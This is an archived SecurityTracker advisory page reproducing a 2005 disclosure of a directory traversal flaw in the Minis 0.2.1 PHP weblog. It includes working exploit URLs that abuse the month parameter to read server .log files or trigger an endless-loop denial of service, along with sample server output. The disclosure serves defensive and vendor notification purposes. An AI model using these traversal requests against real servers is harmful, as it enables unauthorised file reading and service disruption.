SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Minis Vendors:   minis.sourceforge.net
Minis Discloses Certain Files to Remote Users
SecurityTracker Alert ID:  1012911
SecurityTracker URL:  http://securitytracker.com/id/1012911
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 16 2005
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 0.2.1
Description:   Madelman reported a vulnerability in Minis. A remote user can view certain files on the system.

The script does not properly validate the user-supplied month parameter. A remote user can view files that have the '.log' file extension. A demonstration exploit URL is provided:

http://[target]/minis/minis.php?month=../../../../../../../../var/log/XFree86.0

If the user attempts to view a file that the web server process does not have privileges to read, the script will enter an endless loop. A demonstration exploit URL is provided:

http://[target]/minis/minis.php?month=../../../../../../../../var/log/auth

The vendor was notified on December 31, 2004.

Impact:   A remote user can view files on the system that have the '.log' file extension.
Solution:   No solution was available at the time of this entry.
Vendor URL:  minis.sourceforge.net/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Minis directory traversal vulnerability


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Title: Minis directory traversal vulnerability
Vulnerability discovery: Madelman <madelman AT iname.com>
Date: 31/12/2004
Severity: Moderate

Summary:
- --------

(from vendor site: http://minis.sourceforge.net/)

Minis is a tiny, PHP-powered, text-file based weblogging system.
It is easily configured for normal use and it doesnt require any
databases, such as MySQL. Also, with some PHP-knowledge youll be
able to configure Minis endlessly.

Minis doesn't check the month parameter which allows reading any file with .log extension

This vulnerability has been tested with Minis 0.2.1


Details:
- --------

If we want to read /var/log/XFree86.0.log:

REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/XFree86.0
RETURNS: (looking at source of HTML)
[...]
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=This is a pre-release version of XFree86, and is not supported in any
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=way.  Bugs may be reported to XFree86@XFree86.Org and patches submitted
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=to fixes@XFree86.Org.  Before reporting bugs in pre-release versions,
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=please check the latest version in the XFree86 CVS repository
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=(http://www.XFree86.Org/cvs).
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=XFree86 Version 4.3.0.1 (Debian 4.3.0.dfsg.1-4 20040529113443 root@cyberhq.internal.cyberhqz.com)
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Release Date: 15 August 2003
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=X Protocol Version 11, Revision 0, Release 6.6
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Build Operating System: Linux 2.6.6-rc3-bk9 i686 [ELF]
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Build Date: 29 May 2004
[...]

If we try to read a file that doesn't exist (in this example /var/log/XFree86.log) Minis returns "No such month"

REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/XFree86
RESPONSE:
No such month.


If we try to read a file the webserver doesn't have autorization to, Minis enters an endless loop which
could cause an incredible amount of bandwith spent by the server or even a DoS

REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/auth
RETURNS:
Warning: fopen(blog/../../../../../../../../var/log/auth.log): failed to open stream: Permission denied in /var/www/minis/minis.php on line 109

../../../../../../../../var/log/auth

Warning: feof(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 111

Warning: fgets(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 112

Warning: feof(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 111

Warning: fgets(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 112
[...]


Timeline
- --------

31/12/2004 - Vulnerability found
31/12/2004 - Vendor contacted
16/01/2005 - Vendor hasn't replied. Advisory released
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFB6qyg3RWooxY20cIRAg4cAJ41z36lEK44et5nx4V6tspofoo+zACgnLr6
nUEj8oDBySiBN2ScbMinO7s=
=sSF1
-----END PGP SIGNATURE-----
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC